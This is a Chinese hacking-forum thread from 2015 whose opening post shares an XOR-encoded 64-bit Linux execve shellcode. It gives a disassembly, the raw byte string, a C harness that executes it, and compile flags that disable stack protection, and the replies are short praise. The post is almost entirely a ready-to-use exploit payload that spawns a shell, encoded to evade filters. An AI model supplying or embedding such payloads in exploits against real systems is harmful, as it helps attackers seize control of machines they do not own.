查看: 152015|回复: 413

encoded 64 bit execve shellcode

[复制链接]
  • TA的每日心情

    2024-12-14 22:22
  • 签到天数: 1631 天

    [LV.Master]伴坛终老

    发表于 2015-6-30 12:57:39 | 显示全部楼层 |阅读模式
    [C] 纯文本查看 复制代码
    /*
    Compile with: gcc -fno-stack-protector -z execstack
    This execve shellcode is encoded with 0xff and is for 64 bit linux.
     
    shell:     file format elf64-x86-64
     
     
    Disassembly of section .text:
     
    0000000000400080 <start>:
      400080:=0948 b9 ff ff ff ff ff =09movabs rcx,0xffffffffffffffff
      400087:=09ff ff ff=20
      40008a:=0949 b8 ae b7 72 c3 db =09movabs r8,0xfffaf0dbc372b7ae
      400091:=09f0 fa ff=20
      400094:=0949 31 c8             =09xor    r8,rcx
      400097:=0941 50                =09push   r8
      400099:=0949 b8 d0 9d 96 91 d0 =09movabs r8,0x978cd0d091969dd0
      4000a0:=09d0 8c 97=20
      4000a3:=0949 31 c8             =09xor    r8,rcx
      4000a6:=0941 50                =09push   r8
      4000a8:=0949 b8 b7 ce 2d ad 4f =09movabs r8,0x46b7c44fad2dceb7
      4000af:=09c4 b7 46=20
      4000b2:=0949 31 c8             =09xor    r8,rcx
      4000b5:=0941 50                =09push   r8
      4000b7:=09ff e4                =09jmp    rsp
     
    2015 William Borskey
     
    */
    char shellcode[] = "\x48\xb9\xff\xff\xff\xff\xff\xff\xff\xff\x49\xb8\xae\xb7\x72\xc3\xdb\xf0\xfa\xff\x49\x31\xc8\x41\x50\x49\xb8\xd0\x9d\x96\x91\xd0\xd0\x8c\x97\x49\x31\xc8\x41\x50\x49\xb8\xb7\xce\x2d\xad\x4f\xc4\xb7\x46\x49\x31\xc8\x41\x50\xff\xe4";
     
    int main(int argc, char **argv)
    {
        int (*func)();
        func = (int (*)()) shellcode;
        (int)(*func)();
         return 0;
    }
    回复

    使用道具 举报

    该用户从未签到

    发表于 2015-6-30 17:13:23 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-1 06:05:16 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-1 23:35:44 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-2 03:47:24 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-2 09:29:16 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-3 02:54:57 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-3 15:30:56 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-4 14:03:43 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    郁闷
    2016-4-13 21:38
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2015-7-4 16:42:06 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-23 00:35 , Processed in 0.025137 second(s), 12 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部